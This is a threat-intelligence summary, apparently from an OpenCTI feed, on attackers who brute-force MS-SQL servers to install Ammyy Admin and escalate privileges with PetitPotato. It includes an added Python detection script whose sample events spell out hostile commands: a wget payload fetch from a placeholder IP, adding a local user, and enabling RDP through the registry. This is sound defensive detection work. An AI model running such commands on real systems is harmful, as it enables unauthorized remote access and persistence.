
Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY:

A series of attacks targeting poorly managed MS-SQL servers has been identified, in which the attackers install Ammyy Admin, a remote control tool. The attackers exploit vulnerable servers, execute commands to gather system information, and use WGet to install additional malware. The installed malware includes Ammyy Admin (mscorsvw.exe), its settings file (settings3.bin), and PetitPotato (p.ax). The attackers use an old version of Ammyy Admin (v3.10) and employ known exploitation methods to gain remote control. They also use PetitPotato for privilege escalation, adding new users and activating RDP services. To prevent such attacks, administrators are advised to use strong passwords, update software regularly, and implement security measures like firewalls.
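The indicators in the summary above, turned into triage rules over process-creation events, as an added example that is not part of the original report. Only the file names come from the summary; the `sqlservr.exe` parent check, the `net user ... /add` and `fDenyTSConnections` command shapes, and every sample event are assumptions or constructed data.

```python
import re
from pathlib import PureWindowsPath

REPORTED_FILES = {"settings3.bin", "p.ax"}  # file names given in the summary
# Assumed command shapes; the summary names the actions but gives no command lines.
ADD_USER = re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)
ENABLE_RDP = re.compile(r"fDenyTSConnections.*\s/d\s+0\b", re.I)

def triage(event):
    """Return the names of the rules one process-creation event matches."""
    image = PureWindowsPath(event["image"])
    name = image.name.lower()
    cmdline = event["cmdline"]
    tokens = set(re.split(r'[\s"\\/]+', cmdline.lower()))
    hits = []
    # Assumption: commands issued through the database engine run as children of sqlservr.exe.
    if PureWindowsPath(event["parent"]).name.lower() == "sqlservr.exe" and name in {"cmd.exe", "powershell.exe", "wget.exe"}:
        hits.append("sql_service_child")
    # The genuine mscorsvw.exe (.NET optimization service) sits under Windows\Microsoft.NET.
    if name == "mscorsvw.exe" and "microsoft.net" not in [p.lower() for p in image.parts]:
        hits.append("mscorsvw_masquerade")
    if name in REPORTED_FILES or tokens & REPORTED_FILES:
        hits.append("reported_file_name")
    if ADD_USER.search(cmdline):
        hits.append("local_account_added")
    if ENABLE_RDP.search(cmdline):
        hits.append("rdp_enabled")
    return hits

def scan(events):
    return [(i, h) for i, e in enumerate(events) if (h := triage(e))]

SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events (paths, account name and address are made up).
SAMPLE_EVENTS = [
    {"parent": SQL, "image": CMD, "cmdline": "cmd.exe /c whoami"},
    {"parent": SQL, "image": r"C:\ProgramData\wget.exe",
     "cmdline": r"wget.exe http://198.51.100.7/settings3.bin -O C:\ProgramData\settings3.bin"},
    {"parent": CMD, "image": r"C:\ProgramData\mscorsvw.exe", "cmdline": r"C:\ProgramData\mscorsvw.exe"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe", "cmdline": "mscorsvw.exe"},
    {"parent": CMD, "image": r"C:\Windows\System32\net.exe", "cmdline": "net user example_user Constructed#1 /add"},
    {"parent": CMD, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"], "->", ", ".join(hits))
```

The fourth sample event is the legitimate .NET optimization service and is deliberately left unflagged, which is the case the path check exists to separate from the renamed Ammyy Admin binary.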

OPENCTI LABELS:

ms-sql, brute force, remote control, petitpotato, privilege escalation, wget, dictionary attack, ammyy admin


Open in the NetmanageIT OpenCTI public instance with the link below.


NOTE: Use the public read-only username and password shown on the login page banner.


Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin